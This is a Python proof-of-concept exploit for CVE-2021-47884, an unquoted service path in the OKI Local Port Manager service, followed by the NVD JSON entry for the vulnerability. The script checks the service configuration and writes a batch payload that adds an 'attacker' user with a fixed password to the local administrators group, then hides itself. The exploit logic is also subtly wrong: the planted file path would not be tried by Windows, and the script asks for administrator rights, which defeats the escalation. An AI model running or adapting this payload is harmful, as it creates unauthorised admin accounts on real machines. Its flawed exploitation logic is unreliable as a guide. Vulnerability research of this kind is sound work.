CVE-2021-47884

# CVE-2021-47884 PoC - Unquoted Service Path Privilege Escalation # Target: OKI Configuration Tool 1.6.53 - OKI Local Port Manager Service # Author: Vulnerability Research # Note: This is for educational and authorized testing purposes only import os import sys import subprocess import shutil # Configuration SERVICE_NAME = "OKI Local Port Manager" SERVICE_PATH = r"C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe" MALICIOUS_DIR = r"C:\Program Files\Okidata\Common" MALICIOUS_EXE = os.path.join(MALICIOUS_DIR, "portmgrsrv.exe") def check_vulnerability(): """Check if the target service has unquoted service path vulnerability""" try: # Query service configuration using sc command result = subprocess.run( ["sc", "qc", SERVICE_NAME], capture_output=True, text=True ) output = result.stdout # Check if BINARY_PATH_NAME contains unquoted path with spaces if "BINARY_PATH_NAME" in output: lines = output.split('\n') for line in lines: if "BINARY_PATH_NAME" in line: path = line.split("=", 1)[1].strip() # Check if path is unquoted and contains spaces if not path.startswith('"') and " " in path: print(f"[+] VULNERABLE: Unquoted path detected: {path}") return True return False except Exception as e: print(f"[-] Error checking service: {e}") return False def create_malicious_executable(): """Create a malicious executable that will be placed in the unquoted path""" try: # Create directory if it doesn't exist if not os.path.exists(MALICIOUS_DIR): os.makedirs(MALICIOUS_DIR) # Create a simple malicious executable (reverse shell, payload, etc.) # This example creates a simple batch script wrapper malicious_code = '''@echo off REM CVE-2021-47884 Malicious Payload REM In real attack, this would contain actual malicious code REM This creates a new admin user for demonstration net user attacker P@ssw0rd123 /add net localgroup administrators attacker /add REM Clean up and execute legitimate service binary del "%~f0" "C:\\Program Files\\Okidata\\Common\\extend3\\portmgrsrv.exe" ''' # In production, compile to actual executable # For PoC, save as batch file (rename to .exe for actual exploitation) batch_file = os.path.join(MALICIOUS_DIR, "portmgrsrv.bat") with open(batch_file, 'w') as f: f.write(malicious_code) print(f"[+] Malicious batch file created: {batch_file}") print(f"[!] Note: Rename to .exe and place as portmgrsrv.exe for exploitation") return True except PermissionError: print("[-] Permission denied. Run as administrator to create payload.") return False except Exception as e: print(f"[-] Error creating malicious executable: {e}") return False def main(): print("=" * 60) print("CVE-2021-47884 Unquoted Service Path Exploitation PoC") print("Target: OKI Configuration Tool - OKI Local Port Manager") print("=" * 60) if not check_vulnerability(): print("[-] Service not vulnerable or not found.") return if create_malicious_executable(): print("[+] Exploitation prepared.") print("[!] Trigger service restart to execute payload.") print("[!] After exploitation, clean up with: net user attacker /delete") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47884", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OKI Configuration Tool 1.6.53 contains an unquoted service path vulnerability in the OKI Local Port Manager service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Okidata\\Common\\extend3\\portmgrsrv.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "La Herramienta de Configuración OKI 1.6.53 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio OKI Local Port Manager que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Okidata\\Common\\extend3\\portmgrsrv.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20211207181409/https://www.oki.com/me/printing/services-and-solutions/smart-solutions/print-job-accounting/index.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49624", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/configuration-tool-oplclsrv-unquoted-service-path", "source": "[email protected]"}]}}